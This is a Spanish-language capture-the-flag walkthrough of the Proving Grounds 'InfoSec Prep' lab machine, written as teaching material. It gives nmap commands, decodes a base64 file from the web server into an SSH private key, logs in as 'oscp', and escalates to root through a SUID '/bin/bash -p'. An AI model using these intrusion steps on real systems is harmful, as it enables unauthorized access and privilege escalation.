🟢InfoSec Prep

Write-up de la máquina InfoSec Prep de Proving Grounds #writeup #walkthrough

Enumeración

NMAP

Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima.

nmap -p- --open -vvv -Pn -n --min-rate 2000 192.168.148.89 

Están abiertos los puertos 22,80 y 33060 TCP en la máquina objetivo. El siguiente paso es realizar un escaneo más profundo únicamente de los servicios abiertos.

nmap -p22,80,33060 -sVC -vv -Pn -n 192.168.148.89

Tres servicios abiertos:

  • Puerto 22 -> OpenSSH 8.2p1

  • Puerto 80 -> Apache httpd 2.4.41

  • Puerto 33060 -> MySQLx ?

Enumeración web

Tenemos disponible un servidor Web en el puerto 80. Vamos a ver el contenido en el navegador.

Vemos un sitio Web Wordpress. Vamos a inspeccionar el sitio Web para buscar información interesante.

Durante el escaneo intensivo de NMAP, vimos lo siguiente:

Vamos a abrir este archivo en el navegador.

Descargamos este archivo de la siguiente manera:

wget http://192.168.148.89/secret.txt

Tenemos un archivo con contenido codificado posiblemente en base64. Vamos a decodificarlo de la siguiente manera:

cat secret.txt | base64 -d

Es una clave privada. Vamos a crear un archivo id_rsa con la clave descifrada.

cat secret.txt | base64 -d | tee id_rsa

Conexión como usuario "oscp"

Debemos configurar los permisos adecuados para clave privada id_rsa. A continuación, la utilizaremos para iniciar sesión a través del servicio SSH con el usuario "oscp".

Configuramos los permisos para id_rsa.

chmod 600 id_rsa 

Y nos conectamos a través de SSH.

ssh [email protected] -i id_rsa

Ya tenemos conexión con la máquina víctima. Buscamos la flag local.txt

Elevación de privilegios

Probamos las diversas formas de elevar privilegios con sudo pero para todas es necesario conocer una contraseña. Vamos a enumerar archivos que tienen activo el bit SUID. Para ello, ejecutamos lo siguiente:

find / -perm -u=s -type f 2>/dev/null

Tenemos un binario /bin/bash, que puede ser interesante. Para ejecutar este binario:

/bin/bash -p

Ya tenemos privilegios máximos dentro de la máquina víctima. Ahora buscamos la flag para completar la máquina.

Ya tendríamos acabado el CTF Infosecprep.

Last updated